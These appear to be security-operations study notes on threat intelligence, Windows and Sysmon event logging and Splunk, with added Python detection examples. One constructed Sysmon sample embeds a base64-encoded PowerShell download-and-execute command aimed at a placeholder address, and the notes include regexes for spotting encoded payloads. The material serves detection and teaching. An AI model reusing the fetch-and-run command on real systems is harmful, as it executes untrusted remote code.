- Understanding TTPs in Cybersecurity
- From Data to Intelligence: A Progression
- STIX and TAXII: The Intelligence Sharing Framework
- STIX Indicator Example: Malicious IP
- Logging Fundamentals
- Windows Sysinternals and System Monitoring
- Windows Event Log Example: Successful Logon
- Critical Windows Event IDs
- Event ID 4624 Successful Logon
- Event ID 4625 Failed Logon
- Event ID 4670 Permission Change on Object
- Event ID 4688 Process Creation
- Sysmon Event Log Example: Process Creation
- Essential Sysmon Event IDs
- Sysmon Event ID 1 Process Creation
- Sysmon Event ID 3 Network Connection
- Sysmon Event ID 7 Image Loaded
- Sysmon Event ID 11 File Create
- Sysmon Event ID 13 Registry Value Set
- SIEM: Security Information and Event Management
- Splunk Architecture Components
- The Forwarder
- The Indexer
- The Search Head
- Cyber Threat Intelligence Levels
- Strategic CTI
- Operational CTI
- Tactical CTI
- Technical CTI
- Splunk Query Example: Detecting Unusual Encoded Payloads
Understanding TTPs in Cybersecurity
TTP stands for Tactics, Techniques, and Procedures, the vocabulary used to describe how threat actors behave. Tactics are the high-level goals an attacker is pursuing at a given moment, such as gaining initial access or exfiltrating data. Techniques are the general methods used to accomplish a tactic, like phishing or exploiting a public-facing application. Procedures are the specific, detailed steps or tools an actor uses to carry out a technique, for example a particular malware variant, script, or command sequence. The MITRE ATT&CK framework organizes attacker knowledge along exactly these lines, which is why TTPs are the usual unit for anticipating attacks, writing detections, and driving threat hunting and incident response: unlike a hash or an IP address, behavior is expensive for an attacker to change.
From Data to Intelligence: A Progression
The journey from raw data to actionable intelligence involves three stages that build on each other. Data is a raw fact with no context: a single log entry showing that the IP address 192.168.1.10 accessed a server at 03:14 AM. Information emerges when multiple log entries are analyzed together and reveal that 192.168.1.10 tried to access the server 15 times outside normal hours, which adds context and identifies a pattern of unusual behavior. Intelligence is reached when further analysis shows that these access attempts match a known brute-force pattern used by a specific threat group, prompting a proactive block and an alert. That is actionable knowledge that drives a defensive decision.
STIX and TAXII: The Intelligence Sharing Framework
STIX, which stands for Structured Threat Information Expression, is a standardized language used to represent, describe, and share cyber threat information in a structured format. It focuses on the content of threat intelligence, like TTPs, indicators, and incidents. TAXII, or Trusted Automated Exchange of Intelligence Information, is a protocol for exchanging threat intelligence over networks. It focuses on transport, enabling organizations to securely share STIX-formatted data in real-time or batches.
In short, STIX defines what the intelligence is, while TAXII defines how it is shared. TAXII 2.x runs over HTTPS and organizes content into collections that clients poll or push to, so an organization can run a TAXII server that automatically serves its STIX-formatted malware reports to partners daily, ensuring everyone receives the latest threat intelligence in a standardized, authenticated way.
STIX Indicator Example: Malicious IP
The following represents an indicator in STIX, showing a malicious IP associated with a malware campaign.
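As an added example (not the original page's snippet), the block below builds a minimal STIX 2.1 bundle in which an indicator carrying an IPv4 pattern is linked to a malware object through an "indicates" relationship, then extracts the IP the way a consumer feeding a block list would. The object IDs, timestamps, malware name and the 203.0.113.5 address are constructed for the demonstration.

```python
"""Added example (not from the original page): build a minimal STIX 2.1
bundle describing a malicious IP indicator linked to a malware object, then
extract the IOC from the indicator pattern the way a consumer would.
The IDs, timestamps, IP address and malware name are constructed."""
import json
import re

# Constructed identifiers; real objects use freshly generated UUIDv4s.
INDICATOR_ID = "indicator--8e2e2d2b-17d4-4cbf-978f-d9a3e2ccd4a5"
MALWARE_ID = "malware--3a6b0e6c-2c8f-4b05-9a0c-0f3b9b2d8e11"
RELATIONSHIP_ID = "relationship--d5c1a7a8-6c4e-4b1e-8f2a-3b7a6d9e1c22"
BUNDLE_ID = "bundle--0f1d2c3b-4a5e-4f60-8b7c-9d0e1f2a3b4c"


def build_bundle(ip, malware_name="ExampleRAT", ts="2024-05-01T12:00:00.000Z"):
    """Return a STIX 2.1 bundle: indicator --indicates--> malware."""
    indicator = {
        "type": "indicator",
        "spec_version": "2.1",
        "id": INDICATOR_ID,
        "created": ts,
        "modified": ts,
        "name": f"C2 address for {malware_name}",
        "indicator_types": ["malicious-activity"],
        # STIX patterning language; pattern_type and valid_from are required
        "pattern": f"[ipv4-addr:value = '{ip}']",
        "pattern_type": "stix",
        "valid_from": ts,
    }
    malware = {
        "type": "malware",
        "spec_version": "2.1",
        "id": MALWARE_ID,
        "created": ts,
        "modified": ts,
        "name": malware_name,
        "is_family": True,
    }
    relationship = {
        "type": "relationship",
        "spec_version": "2.1",
        "id": RELATIONSHIP_ID,
        "created": ts,
        "modified": ts,
        "relationship_type": "indicates",
        "source_ref": INDICATOR_ID,
        "target_ref": MALWARE_ID,
    }
    return {"type": "bundle", "id": BUNDLE_ID, "objects": [indicator, malware, relationship]}


# Matches a simple single-comparison IPv4 pattern; compound patterns need a real parser.
_IPV4_PATTERN = re.compile(r"\[ipv4-addr:value\s*=\s*'([^']+)'\]")


def extract_ipv4_iocs(bundle):
    """Pull IPv4 values out of every STIX-pattern indicator in a bundle,
    together with the names of whatever each indicator 'indicates'."""
    by_id = {o["id"]: o for o in bundle["objects"]}
    targets = {}
    for o in bundle["objects"]:
        if o["type"] == "relationship" and o["relationship_type"] == "indicates":
            targets.setdefault(o["source_ref"], []).append(by_id[o["target_ref"]]["name"])
    iocs = []
    for o in bundle["objects"]:
        if o["type"] != "indicator" or o.get("pattern_type") != "stix":
            continue
        for ip in _IPV4_PATTERN.findall(o["pattern"]):
            iocs.append({"ip": ip, "indicates": targets.get(o["id"], [])})
    return iocs


if __name__ == "__main__":
    bundle = build_bundle("203.0.113.5")
    print(json.dumps(bundle, indent=2))
    print(extract_ipv4_iocs(bundle))
```

The consumer side deliberately keys on `pattern_type == "stix"` and walks the relationships rather than trusting a free-text description: the pattern is the machine-readable part of the indicator, and the relationship is what tells you which malware family the block list entry belongs to.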
Logging Fundamentals
Logging is the process of recording system, application, or security-related events as they happen. These records help track activities, errors, performance, and potential threats across an environment. Logs provide visibility for troubleshooting, monitoring, auditing, and security investigations.
Windows Sysinternals and System Monitoring
Windows Sysinternals is a collection of advanced system utilities from Microsoft for managing, troubleshooting, and diagnosing Windows systems and applications. Among them, System Monitor (Sysmon) is a service and device driver that provides deep visibility into system activity by logging detailed telemetry such as process creation, network connections, image and driver loads, and file creation to the Windows Event Log. What it records is governed by an XML configuration, so its value depends heavily on a well-tuned ruleset.
Windows Event Logs are the native logs in which the operating system and applications record actions for auditing and troubleshooting: the Security, System and Application logs plus provider-specific channels such as Microsoft-Windows-Sysmon/Operational. Used together, the built-in audit events and Sysmon telemetry let defenders correlate high-level OS events with low-level behavioral detail for more powerful threat detection.
Windows Event Log Example: Successful Logon
The following XML structure represents a Windows Event Log entry for a successful logon event.
Critical Windows Event IDs
Event ID 4624 Successful Logon
This event records when a user or process successfully authenticates. The LogonType field (2 interactive, 3 network, 10 remote interactive, among others) and the source address tell you how and from where the logon happened, which is what separates normal patterns from suspicious ones and makes 4624 valuable for spotting unusual logon types or lateral movement within the network.
Event ID 4625 Failed Logon
This event is triggered when an authentication attempt fails, helping detect brute-force attempts or password spraying campaigns: a brute force shows up as many 4625s for one account from one source, a spray as many 4625s with different TargetUserName values from one source. It is particularly useful in correlation with Event ID 4624 to identify an anomalous success after multiple failures.
Event ID 4670 Permission Change on Object
This event indicates that the permissions on an object such as a file, registry key, or security token were changed. It is important for detecting privilege escalation or malicious ACL manipulation by threat actors; like the rest of object-level auditing, it only fires where the relevant audit policy is enabled.
Event ID 4688 Process Creation
This event shows a new process started on the system, revealing potential malware execution or suspicious binaries. It is essential for hunting living-off-the-land attacks where legitimate system tools are abused for malicious purposes. Note that 4688 requires the Audit Process Creation policy, and the full command line is only included when the "Include command line in process creation events" policy is also turned on; without it, the event gives little more than the image path.
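The 4625-then-4624 correlation described above, and the data-to-information-to-intelligence progression from the earlier section, as an added example that is not part of the original page. The Security log events are constructed tuples (hosts, users, addresses, times and thresholds are all made up): counting failures per source is the information stage, and flagging a success that follows a burst of failures from the same source is the decision the intelligence stage drives.

```python
"""Added example (not from the original page): turn raw Security log events
into information (failures per source) and then into an actionable decision
(block and alert on success-after-failures). Every event below is
constructed; hosts, users, addresses and thresholds are made up."""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed events: (TimeCreated, EventID, TargetUserName, IpAddress, LogonType)
EVENTS = [
    # 192.168.1.10: six 4625s in 25 seconds, then a 4624 -> a brute force that worked
    ("2024-05-01T03:10:00", 4625, "jdoe", "192.168.1.10", 3),
    ("2024-05-01T03:10:05", 4625, "jdoe", "192.168.1.10", 3),
    ("2024-05-01T03:10:10", 4625, "jdoe", "192.168.1.10", 3),
    ("2024-05-01T03:10:15", 4625, "jdoe", "192.168.1.10", 3),
    ("2024-05-01T03:10:20", 4625, "jdoe", "192.168.1.10", 3),
    ("2024-05-01T03:10:25", 4625, "jdoe", "192.168.1.10", 3),
    ("2024-05-01T03:10:40", 4624, "jdoe", "192.168.1.10", 3),
    # 10.0.0.7: a user mistyping a password twice, then logging in -> benign
    ("2024-05-01T09:00:00", 4625, "asmith", "10.0.0.7", 2),
    ("2024-05-01T09:00:30", 4625, "asmith", "10.0.0.7", 2),
    ("2024-05-01T09:01:00", 4624, "asmith", "10.0.0.7", 2),
    # 10.0.0.8: five failures spread over 80 minutes, then a success ->
    # below the rate a 10-minute window is looking for
    ("2024-05-01T11:00:00", 4625, "svc_backup", "10.0.0.8", 3),
    ("2024-05-01T11:20:00", 4625, "svc_backup", "10.0.0.8", 3),
    ("2024-05-01T11:40:00", 4625, "svc_backup", "10.0.0.8", 3),
    ("2024-05-01T12:00:00", 4625, "svc_backup", "10.0.0.8", 3),
    ("2024-05-01T12:20:00", 4625, "svc_backup", "10.0.0.8", 3),
    ("2024-05-01T12:25:00", 4624, "svc_backup", "10.0.0.8", 3),
]


def failures_per_source(events):
    """Information stage: count 4625 events by source address."""
    return Counter(src for _, eid, _, src, _ in events if eid == 4625)


def detect_success_after_failures(events, min_failures=5, window=timedelta(minutes=10)):
    """Intelligence stage: flag a 4624 that follows at least `min_failures`
    4625s from the same source within `window`. Returns one alert per hit."""
    recent = defaultdict(deque)   # source -> timestamps of failures still inside the window
    alerts = []
    for ts_str, eid, user, src, logon_type in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        q = recent[src]
        while q and ts - q[0] > window:   # expire failures older than the window
            q.popleft()
        if eid == 4625:
            q.append(ts)
        elif eid == 4624 and len(q) >= min_failures:
            alerts.append({"source": src, "user": user, "logon_type": logon_type,
                           "failures_in_window": len(q), "success_at": ts_str,
                           "action": "block source and alert"})
            q.clear()   # one alert per burst, not one per later success
    return alerts


if __name__ == "__main__":
    print(failures_per_source(EVENTS))
    for alert in detect_success_after_failures(EVENTS):
        print(alert)
```

The sliding window is what keeps the slow 10.0.0.8 sequence from alerting: a raw count of failures would rank it above the benign 10.0.0.7 case, but five failures across 80 minutes is not the pattern a brute-force rule is looking for, and the threshold and window are the two knobs you tune against your own baseline.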
Sysmon Event Log Example: Process Creation
The following XML structure demonstrates a Sysmon event capturing detailed process creation information.
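Both event formats referenced above (the Windows Event Log entry for a successful logon and the Sysmon process-creation record) share the same XML schema, so the added example below parses them with one small function and then applies two checks a defender would actually run: is this 4624 a network logon from a remote host, and does this Sysmon Event ID 1 carry an encoded PowerShell command that can be decoded back to its script text. This is an added example, not the page's own snippet; both XML records are constructed samples that follow the real Event/System and Event/EventData/Data[@Name] layout, and the hosts, users, addresses, PIDs, hash and command line are made up.

```python
"""Added example (not from the original page): parse Windows Event Log and
Sysmon XML with one small parser, then apply two checks a defender would
run on the result. Both records below are constructed samples that follow
the real schema; hosts, users, addresses, PIDs, hash and command line are
made up."""
import base64
import hashlib
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed Security log record: Event ID 4624, network (type 3) logon.
SAMPLE_4624 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4624</EventID>
    <TimeCreated SystemTime="2024-05-01T03:14:07.123456Z"/>
    <Channel>Security</Channel>
    <Computer>WS01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="TargetUserName">jdoe</Data>
    <Data Name="TargetDomainName">EXAMPLE</Data>
    <Data Name="LogonType">3</Data>
    <Data Name="IpAddress">192.168.1.10</Data>
    <Data Name="IpPort">49832</Data>
    <Data Name="AuthenticationPackageName">NTLM</Data>
  </EventData>
</Event>"""

# The "attacker" command line is built here so the base64 is genuine:
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
PLAINTEXT_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
ENCODED = base64.b64encode(PLAINTEXT_COMMAND.encode("utf-16-le")).decode()
FAKE_SHA256 = hashlib.sha256(b"constructed sample binary").hexdigest()  # placeholder hash

# Constructed Sysmon record: Event ID 1 (process creation).
SAMPLE_SYSMON_1 = f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon"/>
    <EventID>1</EventID>
    <TimeCreated SystemTime="2024-05-01T03:15:02.117000Z"/>
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
    <Computer>WS01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="UtcTime">2024-05-01 03:15:02.117</Data>
    <Data Name="ProcessId">4212</Data>
    <Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -nop -w hidden -enc {ENCODED}</Data>
    <Data Name="User">EXAMPLE\\jdoe</Data>
    <Data Name="Hashes">SHA256={FAKE_SHA256}</Data>
    <Data Name="ParentProcessId">3980</Data>
    <Data Name="ParentImage">C:\\Windows\\System32\\cmd.exe</Data>
    <Data Name="ParentCommandLine">cmd.exe /c start /min powershell</Data>
  </EventData>
</Event>"""


def parse_event(xml_text):
    """Flatten one Windows event XML record into a dict."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    return {
        "provider": system.find("e:Provider", NS).get("Name"),
        "event_id": int(system.find("e:EventID", NS).text),
        "time": system.find("e:TimeCreated", NS).get("SystemTime"),
        "channel": system.find("e:Channel", NS).text,
        "computer": system.find("e:Computer", NS).text,
        # EventData is a list of <Data Name="..."> elements; key them by Name
        "data": {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)},
    }


def is_remote_network_logon(event):
    """4624 with LogonType 3 (network) from a real source address is the shape
    of SMB/RPC lateral movement; local and loopback sources are ignored."""
    d = event["data"]
    return (event["event_id"] == 4624 and d.get("LogonType") == "3"
            and d.get("IpAddress") not in ("", "-", "127.0.0.1", "::1"))


# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
_ENC_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_powershell(event):
    """For a Sysmon Event ID 1, return the decoded -EncodedCommand script text,
    or None when the command line carries no (valid) encoded argument."""
    if event["provider"] != "Microsoft-Windows-Sysmon" or event["event_id"] != 1:
        return None
    m = _ENC_RE.search(event["data"].get("CommandLine", ""))
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    logon = parse_event(SAMPLE_4624)
    print(logon["event_id"], logon["data"]["TargetUserName"], is_remote_network_logon(logon))
    proc = parse_event(SAMPLE_SYSMON_1)
    print(proc["data"]["ParentImage"], "->", proc["data"]["Image"])
    print("decoded:", decode_encoded_powershell(proc))
```

Two details matter in practice: the namespace on the root element, which makes a bare `find("System")` return nothing, and the fact that EventData is a list of `Data` elements distinguished only by their Name attribute, which is why the parser re-keys them into a dict before any field is inspected.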
Essential Sysmon Event IDs
Sysmon Event ID 1 Process Creation
This event logs detailed information about every new process, including hashes, parent process, and command line arguments. It is critical for understanding execution chains and identifying malicious commands being executed on the system.
Sysmon Event ID 3 Network Connection
This event captures TCP and UDP connections made by processes (the Initiated field distinguishes connections the process opened from ones it accepted), which is useful for detecting command-and-control traffic or unusual communications. Because it records the source process alongside the destination IP, port and hostname, it lets you correlate process activity with where that process talks to.
Sysmon Event ID 7 Image Loaded
This event reports DLLs and other images loaded into a process, including signature status and hashes, which is useful for identifying DLL side-loading, unsigned or unexpected modules, and sensitive libraries loaded by processes that have no business using them. It is one of the noisiest Sysmon events, so in practice the configuration filters it down to specific images or directories.
Sysmon Event ID 11 File Create
This event tracks file creation operations, helping identify malware dropping stages or suspicious temporary file activity. It is particularly useful in ransomware investigations where file creation patterns are critical.
Sysmon Event ID 13 Registry Value Set
This event indicates registry modifications that may represent persistence mechanisms, configuration changes, or tampering. It is ideal for detecting autoruns, service changes, or malware implants that modify registry keys.
SIEM: Security Information and Event Management
A SIEM, which stands for Security Information and Event Management, is a cybersecurity solution that collects and analyzes log and event data from across an organization's IT environment. It helps detect, investigate, and respond to security threats in real-time by correlating events, generating alerts, and providing dashboards for monitoring. It combines log management, which involves storing and organizing logs, with security analytics, which focuses on detecting suspicious patterns, to give a centralized view of security posture.
Splunk Architecture Components
The Forwarder
The forwarder runs on the source hosts, collects data from logs, metrics, and events, and sends it (typically over TLS) to one or more indexers. Splunk ships two kinds: the universal forwarder, a lightweight agent that only collects and forwards, and the heavy forwarder, a full Splunk Enterprise instance that can parse, filter, and route data before sending it.
The Indexer
The indexer receives the incoming data from forwarders, parses it into events, and writes both the raw data and the index structures that make it searchable, stored as time-based buckets on disk. It also executes the search requests that search heads distribute to it and returns the matching results; the reports, alerts, and visualizations built on those results are a function of the search head, not the indexer.
The Search Head
The search head provides a user interface for searching, analyzing, and visualizing the indexed data. It distributes search requests across indexers and aggregates the results for the user to analyze and act upon.
Cyber Threat Intelligence Levels
Strategic CTI
Strategic CTI provides high-level insights about cyber threats to support long-term decision-making and risk management. It focuses on trends, threat actor motives, and emerging threats rather than technical details. For example, an intelligence report showing that a nation-state group is targeting critical infrastructure in a region helps executives plan defenses and allocate resources appropriately.
Operational CTI
Operational CTI delivers actionable information about specific cyber threats, campaigns, and incidents that can guide defense measures. It helps security teams anticipate attacks and respond effectively. For instance, information about an ongoing ransomware campaign targeting financial institutions enables the security team to apply targeted safeguards and protective measures.
Tactical CTI
Tactical CTI provides details about the tactics, techniques, and procedures used by attackers. It supports incident response and threat hunting by describing how attacks are executed. For example, a report showing that attackers are using phishing emails with malicious macros allows defenders to block those indicators and educate users.
Technical CTI
Technical CTI focuses on specific indicators of compromise such as IP addresses, domain names, hashes, or malware signatures. It is highly granular and used directly for automated detection and blocking. For instance, knowing that the IP address 192.168.10.5 is associated with a botnet allows a firewall to block traffic from that IP immediately.
Splunk Query Example: Detecting Unusual Encoded Payloads
The following Splunk query is designed to surface unusual encoded payloads in outbound HTTP traffic that may indicate data exfiltration or command-and-control communications. It keeps only POST requests whose response body is large, then requires a run of at least 40 base64-looking characters in the URI (without that regex the query would flag any large upload, encoded or not), and grades the result by size. The field names (bytes_out, uri, src_ip, dest_ip) depend on the field extractions of the proxy sourcetype, and the byte thresholds need tuning against the environment's normal upload sizes.
index=network sourcetype=proxy method=POST
| where bytes_out > 50000
| regex uri="(?:[A-Za-z0-9+/]{4}){10,}={0,2}"
| eval suspicious_payload = if(bytes_out > 100000, "High", "Medium")
| table _time, src_ip, dest_ip, uri, bytes_out, suspicious_payload
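The same detection logic as the Splunk query, re-implemented as an added example in Python over constructed proxy log lines so it can be run offline and its thresholds exercised. This is not code from the original page; the log format (space-separated time, src_ip, dest_ip, method, uri, bytes_out), the addresses, the 50000/100000 byte thresholds and the entropy floor are assumptions made for the demonstration.

```python
"""Added example (not from the original page): the detection logic of the
Splunk query above, re-implemented over constructed proxy log lines. The
log format, addresses and thresholds are assumptions for this demonstration."""
import base64
import math
import re

# Stand-in for an exfiltrated blob: 64 constructed bytes, base64-encoded (88 chars).
BLOB = base64.b64encode(bytes(range(64))).decode()

# Constructed proxy log lines: time src_ip dest_ip method uri bytes_out
PROXY_LOG = f"""2024-05-01T03:20:01 192.168.1.10 203.0.113.5 POST /upload?data={BLOB} 120000
2024-05-01T03:21:14 192.168.1.10 203.0.113.5 POST /api/v1/sync?q={BLOB} 60000
2024-05-01T03:22:30 10.0.0.7 198.51.100.20 POST /forms/submit 70000
2024-05-01T03:23:02 10.0.0.9 203.0.113.5 GET /download?id={BLOB} 200000
2024-05-01T03:24:45 10.0.0.7 198.51.100.20 POST /login?token={BLOB} 900"""

# Same shape as the SPL regex: ten or more 4-character base64 groups, optional padding.
_B64_RUN = re.compile(r"(?:[A-Za-z0-9+/]{4}){10,}={0,2}")


def shannon_entropy(s):
    """Bits per character: 0 for a repeated character, close to 6 for uniform base64."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_encoded(uri, min_entropy=3.0):
    """True if the URI carries a long base64-looking run that is not just one
    repeated character; the entropy floor filters padding such as 'AAAA...'."""
    return any(shannon_entropy(m.group(0)) >= min_entropy for m in _B64_RUN.finditer(uri))


def parse_line(line):
    ts, src, dst, method, uri, bytes_out = line.split()
    return {"_time": ts, "src_ip": src, "dest_ip": dst, "method": method,
            "uri": uri, "bytes_out": int(bytes_out)}


def detect_encoded_posts(log_text, min_bytes=50000, high_bytes=100000):
    """Mirror the SPL: POST, bytes_out above the floor, base64-like URI;
    severity is High above `high_bytes`, otherwise Medium."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev["method"] != "POST" or ev["bytes_out"] <= min_bytes:
            continue
        if not looks_encoded(ev["uri"]):
            continue
        ev["suspicious_payload"] = "High" if ev["bytes_out"] > high_bytes else "Medium"
        hits.append(ev)
    return hits


if __name__ == "__main__":
    for h in detect_encoded_posts(PROXY_LOG):
        print(h["_time"], h["src_ip"], h["dest_ip"], h["bytes_out"], h["suspicious_payload"])
```

Of the five constructed lines only the first two are reported: the third is a large but plain POST, the fourth is a GET, and the fifth is far below the size floor. The entropy check is the one refinement over the SPL version; it is cheap, and it stops a long run of a single repeated character (common in padded form fields) from counting as an encoded payload.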